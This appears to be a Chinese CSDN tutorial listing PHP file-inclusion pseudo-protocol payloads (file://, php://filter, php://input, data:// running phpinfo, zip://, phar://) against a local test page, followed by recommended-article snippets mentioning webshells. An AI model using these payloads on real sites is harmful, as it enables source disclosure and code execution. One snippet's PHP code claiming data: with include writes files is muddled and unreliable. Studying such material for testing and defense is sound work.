php包含伪协议利用方法

最新推荐文章于 2024-09-28 17:54:20 发布
最新推荐文章于 2024-09-28 17:54:20 发布
阅读量161 收藏 5
点赞数 7
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58771233/article/details/141883864
版权

一.file://

使⽤: file:// ⽂件的绝对路径和⽂件名

123.php?cmd=file://D:\xuexi\xiaopi\phpstudy_pro\www\123.txt

二.php://filter

123.php?cmd=php://filter/read=convert.base64-encode/resource=1.php

三.php://input

步骤一:123.php?cmd=php://input抓包

步骤二,右键修改请求方法,修改数据包

步骤三,放行访问

四.data://

⽤途:数据( RFC2397 )

123.php?cmd=data:text/plain,<?php phpinfo();?>

五.zip://

⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)

123.php?cmd=zip://D:\phpstudy_pro\WWW\2.zip%232.txt

六.phar://

⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)

123.php?cmd=phar://D:\phpstudy_pro\WWW\2.zip\2.txt

小黄鼠狼
关注
php伪协议 文件包含,文件包含漏洞(伪协议利用
weixin_33166692的博客
03-30 1049
实验环境1.已经配置好的WEB服务器2.文件包含页面include.php:文件包含phpinfo(); //一些伪协议的使用需要关注 allow_url_include 和 allow_url_fopen的状态include($_GET['f']);?>3.伪协议利用file伪协议,通过这个协议可以对系统中的文件进行包含,不过一定要是绝对路径1-1php伪协议,有两种类型 input 和 ...
php伪协议漏洞_php伪协议利用文件包含漏洞
weixin_36284062的博客
01-17 481
php支持多种封装协议,这些协议常被CTF出题中与文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy中的设置为5.4.45版本,设置allow_url_fopen和allow_url_include都为On.index.phpindex.php同级目录下有mytest001.txt ,mytest002.txt ,mytest003.zip(其中包含mytest...
文件包含PHP伪协议利用方法
qq_65852138的博客
09-03 443
文件包含PHP伪协议利用方法
文件包含漏洞PHP伪协议利用方法
2401_82451607的博客
09-03 540
文件包含php伪协议的使用方法
文件包含PHP伪协议利用方法 本地复现
2301_82061181的博客
09-03 600
cmd=php://input利用burp抓包。步骤二:创建123.php文件输入一句话木马。less-3 php://input协议。php.ini ⾥有两个重要的参数。php://filter协议。创建2.txt文件进行压缩。步骤三:创建1.php
文件包含漏洞& 文件伪协议利用
cike_y
09-11 1792
可能你会问,为什么不是php后缀名而是txt格式,因为我尝试过了,如果是使用的是php格式,那么服务端访问的时候不仅不需要解析,而且只是单纯的访问我的php代码,执行的是我自己的脚本,而不是服务器。就有题目所说是远程包含漏洞,我也懒得测试了,可以发现输入百度链接的时候直接跳转,那么我们可以尝试构造一句话木马搭建在本地的服务,让文件包含解析到攻击者的文本文件而成功的触发到让脚本代码得到解析。我在测试的时候忘记了自己的网站服务是搭建在D盘里,而我的文件是在E盘所以我以为是我的文件包含代码写错了。
PHP伪协议利用
Echo__h的博客
04-24 350
PHP内置的URL风格的封装协议 其中,常用的主要有:php://filter php://input phar://在文件包含php文件时会自动执行,而无法读出其源码,使用php://filter可以对文件内容进行读取 读取的内容为b64编码格式,解码后即为文件源码此方法需要allow_url_include = 0n.php://打开文件流后,我们可以直接发送post写入恶意代码,即可执行主要用于在PHP中对压缩文件的读取。多用于配合文件上传漏洞使用例如将shell.txt压缩成zip格式后上传到服务器
Web安全之PHP伪协议漏洞利用,以及伪协议漏洞防护方法
Scalzdp的专栏
11-13 2350
单纯看伪协议利用与之前的文件包含漏洞及其相似,但是在真实环境中是对用户输入进行了过滤替换的,在使用漏洞就需要不断考虑如何绕过这些过滤条件。只要我们开发过程中对于使用了伪协议这些函数的时候,一定要严格对用户参数进行过滤,避免一时偷懒导致服务器被黑,其实最终难逃其就。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。
文件包含&PHP伪协议利用
技术超强的网络安全平台
11-20 5577
文件包含&PHP伪协议利用 相关函数 要想成功利用文件包含漏洞进行攻击,需要满足以下两个条件: 1、Web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件; 2、用户能够控制该动态变量。 php中引发文件包含漏洞的通常是以下四个函数: (1) Require: 找不到被包含的文件时会产生致命错误(E_COMPILE_ERROR),并停止脚本,如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。; (2) Require_once:与 include 类
PHP文件包含——伪协议
qq_52072846的博客
02-28 2357
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文 件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以 上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建555.txt,内容为 压缩,压缩后在浏览器访问 php://inp..
php伪协议.pdfphp伪协议.pdfphp伪协议.pdf
02-24
### PHP 伪协议详解 #### 一、概览 PHP 伪协议是一种特殊的 URL 格式,用于在 PHP 代码中执行特定的操作。这些伪协议主要用于处理文件读取、网络请求以及数据处理等方面。理解并恰当地使用 PHP 伪协议对于开发安全...
php伪协议.zipphp伪协议.zip
02-24
在提到的“php伪协议.docx”文件中,可能包含了更详细的关于PHP伪协议的使用示例、历史背景,以及如何在受限环境中安全地使用这些机制的信息。这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP伪协议来实现...
php伪协议读取目录,PHP文件包含,文件读取的利用思路,以及配合伪协议的trick...
weixin_31178795的博客
03-28 1360
PHP的文件包含函数有两类,分三种:12file_get_contents()include()/include_once() require/require_once()第一种用于获取文件的数据,第二种用于包含并执行代码与读取文件两种功能php写文件的函数1file_put_contents()基本的思路就是用来写shell吧,不过会有各种限制,但是结合伪协议就可以简单绕过了file_get_...
基于php的幸运舞蹈课程工作室管理系统
计算机学姐的博客
09-28 570
【2025最新】基于php+vue+MySQL的幸运舞蹈课程工作室管理系统,前后端分离。
PHP中error_reporting函数作用
sheji888的专栏
09-24 808
除了使用PHP内置的错误处理机制外,你还可以使用函数来定义自己的错误处理函数。这允许你更灵活地控制错误报告的行为,例如,将错误信息发送到外部系统或显示自定义的错误页面。
web平台搭建-LAMP(CentOS-7)
gsdgdg00的博客
09-24 728
一. 准备工作环境要求:操作系统:CentOS 7.X 64位网络配置:nmtui字符终端图形管理工具或者直接编辑配置文件关闭SELinux和firewalld防火墙防火墙:临时关闭:systemctl stop firewalld永久关闭:systemctl disable firewalld。
php中打印函数
09-24 400
PHP中,打印函数主要用于输出或显示数据。常用的打印函数包括:
基于php的医院信息管理系统
最新发布
计算机学姐的博客
09-28 537
【2025最新】基于php+vue+MySQL的医院信息管理系统,前后端分离。
玄机--蚁剑流量
m0_75046593的博客
09-23 537
第一特征蚁剑的请求包加密,返回包以明文形式传输第二特征http头中存在init_set字段并且content-type是urlencoded。
php利用伪协议和 include 向文件中写数据
09-07
PHP中的伪协议可以用来访问不同的数据源,比如本地或远程文件。使用include语句结合特定的伪协议,可以实现向文件中写入数据的功能。这种方法通常不是最佳实践,因为它可以带来安全风险,比如可能会被用来执行远程文件包含(RFI)攻击。在正常开发中,应当使用更为安全的方法来处理文件读写操作。 一个简单的例子是使用data:伪协议。这个协议可以创建一个只存在于内存中的数据块,并且可以将其内容当作文件读取。下面是一个简单的示例代码: ```php <?php // 创建一个包含数据的字符串 $data = "这里是写入的数据"; // 使用data:伪协议将数据写入到一个“虚拟”文件中 $file = fopen("data:text/plain," . urlencode($data), 'r'); // 检查文件是否成功打开 if ($file) { // 将“虚拟”文件内容包含进来,这里就是将数据写入到当前的PHP脚本中 include $file; fclose($file); } ?> ``` 在这段代码中,我们首先将要写入的数据编码为URL编码格式,然后将其嵌入到data:伪协议中。接着,使用fopen函数以只读模式打开这个“文件”,并将内容包含进当前的PHP脚本中。这样,我们就把数据“写入”到了文件中。 需要注意的是,尽管这种方法可以实现写入操作,但并不意味着这是一个推荐的实践。在实际开发中,应当使用更安全的文件操作函数如file_put_contents()来处理文件写入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值